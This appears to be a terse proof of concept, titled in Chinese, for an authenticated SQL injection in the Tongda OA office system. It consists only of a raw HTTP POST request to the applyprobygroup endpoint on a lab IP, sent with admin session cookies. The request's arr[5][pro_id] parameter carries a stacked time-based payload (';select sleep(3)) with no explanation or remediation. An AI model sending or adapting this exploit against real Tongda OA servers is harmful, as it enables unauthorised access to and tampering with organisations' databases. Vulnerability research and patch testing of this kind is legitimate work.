通达OA 后台SQL 注入
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar i/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://10.211.55.5 Referer: http://10.211.55.5/general/officeProduct/product_apply/index.php Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5 ; SID_1=24205621 Connection: close arr[5][pro_id]=151';select sleep(3) %23